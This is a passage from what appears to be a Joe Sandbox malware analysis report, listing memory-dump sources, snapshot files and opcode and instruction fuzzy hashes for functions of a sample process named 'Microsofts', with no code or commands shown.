                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4decf9bed0800fdafc5e9a04ba00495d257b53be8eefc2b52a71fd7778f759de
                                                                                                                                              • Instruction ID: 861d26149bf541464189e6ace6d63364c2b1f101f89960d1e1e76affe07b5829
                                                                                                                                              • Opcode Fuzzy Hash: 4decf9bed0800fdafc5e9a04ba00495d257b53be8eefc2b52a71fd7778f759de
                                                                                                                                              • Instruction Fuzzy Hash: 08F12A71A04215DFCB04CF69C989DADBBF6FF88354B2A80A9E515AB361CB30EC45CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bc02eabf8ff4d11eeb86692388bb61ede52bf73e000ad271c3b3bb777da8b029
                                                                                                                                              • Instruction ID: 123e59a99dfcb5a90e51de1aa3ca064ddc0de47becc13a9f4d4a1c8bbf495ab7
                                                                                                                                              • Opcode Fuzzy Hash: bc02eabf8ff4d11eeb86692388bb61ede52bf73e000ad271c3b3bb777da8b029
                                                                                                                                              • Instruction Fuzzy Hash: E861C472B142059FC7249E7DD894AAFBBB5EBC8324B14862AE559D73A0D731DC01C7A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d38fee2b8a0f3a2c131b9b364ca8a48b084330efd43a34387eb697a7dea062a9
                                                                                                                                              • Instruction ID: 76cf81d40132c01ccbaeec4c1d9c4ab7198049ae4f6dad7935943b85a38391c7
                                                                                                                                              • Opcode Fuzzy Hash: d38fee2b8a0f3a2c131b9b364ca8a48b084330efd43a34387eb697a7dea062a9
                                                                                                                                              • Instruction Fuzzy Hash: 165190317181559FC714DF39ECA5D2ABBEABF4962830545BAF41AEB261EB30EC01CB50
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 94039d4d06031a1fd3d25adef07f6a62422ee4b3d124bd76c249bdd7dfb9b684
                                                                                                                                              • Instruction ID: 2f51590850b9257b0486dfae3709e93780633c00d251eb1565b8202ebdc0930f
                                                                                                                                              • Opcode Fuzzy Hash: 94039d4d06031a1fd3d25adef07f6a62422ee4b3d124bd76c249bdd7dfb9b684
                                                                                                                                              • Instruction Fuzzy Hash: C1415131E402199BDB14DFA5C891EDEBBF6BF88744F248129E415B7240EB70A946CFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: a1b4af555c3f57c199f2537b102ffd7d72ee275269ea0945226647c2f06b6a1a
                                                                                                                                              • Instruction ID: 04b61efe41f68dfc94febc5e4f0af726114cedc4e81dcbdf0f0f9cc3df80d600
                                                                                                                                              • Opcode Fuzzy Hash: a1b4af555c3f57c199f2537b102ffd7d72ee275269ea0945226647c2f06b6a1a
                                                                                                                                              • Instruction Fuzzy Hash: 1D419174E01248DFCB58DFAAD884A9DBBB2FF89300F249529E405BB364DB30A945CF14
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6ae1e6f5ce3d8a4996edd0b1d4851e78ae2cce7a544b4f7b92547cbc0e1278ac
                                                                                                                                              • Instruction ID: 6699315353dfbda4f45914fe1ce8da08dd315d8de603ff60078eecfe1a795f60
                                                                                                                                              • Opcode Fuzzy Hash: 6ae1e6f5ce3d8a4996edd0b1d4851e78ae2cce7a544b4f7b92547cbc0e1278ac
                                                                                                                                              • Instruction Fuzzy Hash: 2C31BEB047224FAFDB802B21A5AE17A7FB6FB0F313745BE45F12A905369F7044488B15
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 7a849f63b8d34be4ac9bb96d86dc7adf6655dbd0a4bb30d083250c94113c56f4
                                                                                                                                              • Instruction ID: 5be11edaf49a94f0da7cd2e9d52609e47bdeacf66e900d32932cf724efbc9653
                                                                                                                                              • Opcode Fuzzy Hash: 7a849f63b8d34be4ac9bb96d86dc7adf6655dbd0a4bb30d083250c94113c56f4
                                                                                                                                              • Instruction Fuzzy Hash: DD319E3120420AAFCF019F65D869EBF7BB3FB89745F108425F91687254CB75C9A1CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b2435df19da6ba2f3fde0b287234c9dd73f69cac00b1110cf2d71ae4af670b37
                                                                                                                                              • Instruction ID: a863b6ff049a0ece0ae8ac0f1b39599623757a89d05b67e759a30218e3acdc45
                                                                                                                                              • Opcode Fuzzy Hash: b2435df19da6ba2f3fde0b287234c9dd73f69cac00b1110cf2d71ae4af670b37
                                                                                                                                              • Instruction Fuzzy Hash: 4831F5312092999FCB029F28E466EBBBFB2FF46248F04406AF4458B296D674CD55C7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 885ceea683a2ce028899407d8d40daf1d3a2b47e7a19baacff60e5439d7b1802
                                                                                                                                              • Instruction ID: ac42ace19357582071176ee9a40019c391097557058299f5f27f338384835cfa
                                                                                                                                              • Opcode Fuzzy Hash: 885ceea683a2ce028899407d8d40daf1d3a2b47e7a19baacff60e5439d7b1802
                                                                                                                                              • Instruction Fuzzy Hash: 1B2133313042109BCB246B3A9C7AE3D7A9BBFC566DB148039F516EF3A0EA24CC419391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c87be62e985bf4f5a4caf5da069c5d72d01b5b0d9b1ccf5b10fd7fa0dc330c34
                                                                                                                                              • Instruction ID: b4af2f4407c207b7da00a19ea6d5c335e812601178d55ce351243842b0b09976
                                                                                                                                              • Opcode Fuzzy Hash: c87be62e985bf4f5a4caf5da069c5d72d01b5b0d9b1ccf5b10fd7fa0dc330c34
                                                                                                                                              • Instruction Fuzzy Hash: CF21F1303442105BDB14672ACC7AE3E769BBFC4669F148039F516EB3A4EA69CC42D391
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: bdd6805d59aecbf9c426d238565c6b302e5d93a48ca77eefe56e726cc65d42d1
                                                                                                                                              • Instruction ID: 8ae6d1be0ea53a1b41f02b7ec36f998f2644f8d10665a07cda0f83c7c665062f
                                                                                                                                              • Opcode Fuzzy Hash: bdd6805d59aecbf9c426d238565c6b302e5d93a48ca77eefe56e726cc65d42d1
                                                                                                                                              • Instruction Fuzzy Hash: 44319070A00209CFCB05DF68C895EAEBBF6FF85754B158559E4299B3A1CB30DC42CB94
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4795d0765f8d7551368d26720fd0b54f0148475d8019b579dda43bdd09060c29
                                                                                                                                              • Instruction ID: 19209ebef826f593a64dbd1ee0aa5e697ff95a7f01820ef3d35520b5ba0b8147
                                                                                                                                              • Opcode Fuzzy Hash: 4795d0765f8d7551368d26720fd0b54f0148475d8019b579dda43bdd09060c29
                                                                                                                                              • Instruction Fuzzy Hash: FC21A135E001169FCB14DF64D480AAF37A5EB89364B14C519D91D9B390EB34FE4ACBD2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: aee2fc1ba725db9957a22f58e8bbe8b934808b0bcea3fd58cd7af4e9895e23e1
                                                                                                                                              • Instruction ID: dc8f84d1cec1706ef1f80c522253edc57678083e4aeb2333e4ad998ac3d34162
                                                                                                                                              • Opcode Fuzzy Hash: aee2fc1ba725db9957a22f58e8bbe8b934808b0bcea3fd58cd7af4e9895e23e1
                                                                                                                                              • Instruction Fuzzy Hash: 5421D4357082854FCB1567B898697AD3FA6DF86345F0905BBDA09CB3E2CD348C06C7A0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3273248019.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_136d000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 44ad5c244f797facc40ee69da03c2ffbc33497a2f4f92e215f175a450cc4772f
                                                                                                                                              • Instruction ID: 687c46e0718fd286da5ddfb357ccaa50d0695fe6fa3cae3d3ff2cd6cf22fb789
                                                                                                                                              • Opcode Fuzzy Hash: 44ad5c244f797facc40ee69da03c2ffbc33497a2f4f92e215f175a450cc4772f
                                                                                                                                              • Instruction Fuzzy Hash: 5A212271604204DFCB15DF98D980F26BBA9FB88318F20C56DD9894B25AC33AD406CA62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: f1b8036b857434a5df977222c0acb1aa0af5c58d0a391c0389e71c1e7f7281d8
                                                                                                                                              • Instruction ID: 942a5e4ffae8d62e1ae7c6c49d104036e4e26c1c959d7bf6bef83539a15c46ea
                                                                                                                                              • Opcode Fuzzy Hash: f1b8036b857434a5df977222c0acb1aa0af5c58d0a391c0389e71c1e7f7281d8
                                                                                                                                              • Instruction Fuzzy Hash: B6213B74E00209ABCB49EFA9C450BAEBBB6FF85349F10C56AC405AB3A4DB749D05CF51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 41728e9b12ec33f68bf270f3b250533997a18ab9a796cdda305b0564eb633691
                                                                                                                                              • Instruction ID: d24736d276f72945395a5c66ed7ae71b5e68be3ee44416357e913d0c529bcb09
                                                                                                                                              • Opcode Fuzzy Hash: 41728e9b12ec33f68bf270f3b250533997a18ab9a796cdda305b0564eb633691
                                                                                                                                              • Instruction Fuzzy Hash: 3D11E932308395AFCB476F7898645AF7FB7AFC6200B10445AD516CB392CE358D06C792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5730200ab22adf1b4e52343f8f94f5d77f3c97ae601ef825e69dded3d58c590f
                                                                                                                                              • Instruction ID: 49f463787457dcc416391db7d43d42cbdbb1e845927efec25a10cdf20e7a2a47
                                                                                                                                              • Opcode Fuzzy Hash: 5730200ab22adf1b4e52343f8f94f5d77f3c97ae601ef825e69dded3d58c590f
                                                                                                                                              • Instruction Fuzzy Hash: 0F219A71A00208EFDB20CF54C809FAABBF7FB48318F04816AE52A9B251D371D954CBA0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 59b92cc0286183aa4a96bf85335c3b3892ba77488241a7ac3b5b8bb6bde4e905
                                                                                                                                              • Instruction ID: 7b8ceaf824493152aa915c83e11448363bb23658370d40fa93e6ce465472ed55
                                                                                                                                              • Opcode Fuzzy Hash: 59b92cc0286183aa4a96bf85335c3b3892ba77488241a7ac3b5b8bb6bde4e905
                                                                                                                                              • Instruction Fuzzy Hash: E5113A353042148FC714DB69E994F66B7F6FF98725B10846AE14A8B3B4CB71EC44CB60
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: c7d548fd3852befed6e5498a442847f0ec3b26a4de6d6322e5eb5ff8d01a90aa
                                                                                                                                              • Instruction ID: f1d38a93b0f004adbc16fbbe4025682316bc22e3134e175668244732f595240d
                                                                                                                                              • Opcode Fuzzy Hash: c7d548fd3852befed6e5498a442847f0ec3b26a4de6d6322e5eb5ff8d01a90aa
                                                                                                                                              • Instruction Fuzzy Hash: F6212570C4420A8FCB01DFB9D8945EEBFB0AF4A310F0446AAD409B7261EB345A95CBA5
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: aaaaa4afe49b1f0c00a900ce8f57d45da1990b14537cf3047ef6187640d6f8c7
                                                                                                                                              • Instruction ID: 071270f98c2155a9ccf9548b332d85d6a12bfb4a4f06f28ef9005f26c5e0a358
                                                                                                                                              • Opcode Fuzzy Hash: aaaaa4afe49b1f0c00a900ce8f57d45da1990b14537cf3047ef6187640d6f8c7
                                                                                                                                              • Instruction Fuzzy Hash: CE1126B2800249EFCB10DF99C945BEEBFF5FB48320F248419E518A7210C379A954DFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: d9072f12c6d509c8c37409dff79ebdb2f61013b807faa75b96df073715eb5fdc
                                                                                                                                              • Instruction ID: 0d3e5b39002865820b21bb0baf4c398db89424d5c772ac67c919f6d7d88ad8a2
                                                                                                                                              • Opcode Fuzzy Hash: d9072f12c6d509c8c37409dff79ebdb2f61013b807faa75b96df073715eb5fdc
                                                                                                                                              • Instruction Fuzzy Hash: 181126B6800249AFCB10DF99D945BDEBFF5FB48320F14841AE518A7210C739A554DFA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: b37d87b233a643b97a42bfdc198407b15110dc15ec5d2ece64d62f3cdd211a03
                                                                                                                                              • Instruction ID: 6571b691396ffb1afe9d15e8661e0088ecac904a7ed36501e25e7432cd5fcfd0
                                                                                                                                              • Opcode Fuzzy Hash: b37d87b233a643b97a42bfdc198407b15110dc15ec5d2ece64d62f3cdd211a03
                                                                                                                                              • Instruction Fuzzy Hash: AF01F132F003455FD7149A7A8898A6B77EAAF84619710883ED90AC7364FF70CC01CB92
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 5d4050c69e1f4d0c5aeafea88dac2186a0019b195dbd86f0d985cf95a54646fa
                                                                                                                                              • Instruction ID: 256133a65517d2aa2a19666d4e2d621441ec703aaab431fe567ba1ade39d35d9
                                                                                                                                              • Opcode Fuzzy Hash: 5d4050c69e1f4d0c5aeafea88dac2186a0019b195dbd86f0d985cf95a54646fa
                                                                                                                                              • Instruction Fuzzy Hash: 691188316042008FD724DB29C988B96B7B5EF89715F1580AAD189CB3B5CB70DC49CB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 0fe207d22350c75fe710e049c331383f2933546ba4ab9391bef1f6eef1da5c21
                                                                                                                                              • Instruction ID: 404225436e2d08012357fc267584f9d58ae65a491ac978dd2626594ece277b8d
                                                                                                                                              • Opcode Fuzzy Hash: 0fe207d22350c75fe710e049c331383f2933546ba4ab9391bef1f6eef1da5c21
                                                                                                                                              • Instruction Fuzzy Hash: EB112734E001499FDB04DFA8D851FEEBBB2AF48315F4194A5E808AB349EA3099418B51
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3273248019.000000000136D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0136D000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_136d000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                              • Instruction ID: 3ab1562091190088aca0d9626a0f7fd16e5dcd8978a885c83b4f1aa0f8b3a29b
                                                                                                                                              • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                                                                                                                              • Instruction Fuzzy Hash: 5D11BE75604280CFDB12CF54D9C4B15BF61FB84318F24C6AAD8894B65BC33AD44ACB62
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 6669dcb809c84c2a082abb7fc3b4ef79da42873651109d97fce2885c71a081c2
                                                                                                                                              • Instruction ID: 746c9b7a525d7b372945c40a052d251cd850cb308d6c603b5abcaf580c8c114f
                                                                                                                                              • Opcode Fuzzy Hash: 6669dcb809c84c2a082abb7fc3b4ef79da42873651109d97fce2885c71a081c2
                                                                                                                                              • Instruction Fuzzy Hash: AD01A232F002555FD714AA7A8858A2E76EBAFC4669750893DDA0AC7364FF70CC018792
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 553c9a16d121f3a59ce71db5647282b50d01bcd0e974643c8b4dcafec3edb9e3
                                                                                                                                              • Instruction ID: d41c50db9c32b59863dbec49561c092e427e6ce1d9fa0faa5d2bbfc871416fc0
                                                                                                                                              • Opcode Fuzzy Hash: 553c9a16d121f3a59ce71db5647282b50d01bcd0e974643c8b4dcafec3edb9e3
                                                                                                                                              • Instruction Fuzzy Hash: C601D633608258BFCB168F54AC11EEE7B67FBCA750F188066FA55C7240D635CC159B90
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: de4d2f00c7ae1614a5a42875e5b070180bf4af2cd5556b8e44a6acc9fd619379
                                                                                                                                              • Instruction ID: 0320947f7e91d84e4d4c998f4b056f62dc500e557d44d93083cfc13a7855880f
                                                                                                                                              • Opcode Fuzzy Hash: de4d2f00c7ae1614a5a42875e5b070180bf4af2cd5556b8e44a6acc9fd619379
                                                                                                                                              • Instruction Fuzzy Hash: E3018071A0020DAFCB109F68E8585AE7FB6FB88350B004129FA1A97390DF308D10CBA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3293820350.0000000005A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A30000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_5a30000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: e08e0399e7265a19e744ea587a6e16c7a7b6e0ae0821f079f674fdd1f12aa181
                                                                                                                                              • Instruction ID: 6ab373724a6aa139fbbafc77a840e9a81742d37d5f1886012047cc0db15bcd13
                                                                                                                                              • Opcode Fuzzy Hash: e08e0399e7265a19e744ea587a6e16c7a7b6e0ae0821f079f674fdd1f12aa181
                                                                                                                                              • Instruction Fuzzy Hash: 4601D632704128BBCB559F599810EEF7BABEBC9790F148029FA16D7340DA75CC119BD0
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 8871626166527f4d4e3c43cc3c40381f5c0eacfb30bec5d150e5fcee04bd412f
                                                                                                                                              • Instruction ID: 338628b6fe6df96c99b68eb1a2c2362663bb38f68c013cdc7030c9f5b096df9a
                                                                                                                                              • Opcode Fuzzy Hash: 8871626166527f4d4e3c43cc3c40381f5c0eacfb30bec5d150e5fcee04bd412f
                                                                                                                                              • Instruction Fuzzy Hash: 2F01217191021DAFCB10DF69D889AAE7FB5FB88250B40412AFA59D3361DB308D11CBA2
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 110e0cfc04301a49193f9d705ccc33a876f9f4e42ec772922962221700bc413e
                                                                                                                                              • Instruction ID: ad4c03c0ef76b8f4b9bb5fc2070503f5ea928694636e3b8f9a3f97d4547e9295
                                                                                                                                              • Opcode Fuzzy Hash: 110e0cfc04301a49193f9d705ccc33a876f9f4e42ec772922962221700bc413e
                                                                                                                                              • Instruction Fuzzy Hash: E4F0F6367143489BCB151778A84E67D3FA7EBCA221B044467E64ACB3D1DE35CC42D7A1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000009.00000002.3275320755.0000000002D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D00000, based on PE: false
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_9_2_2d00000_Microsofts.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
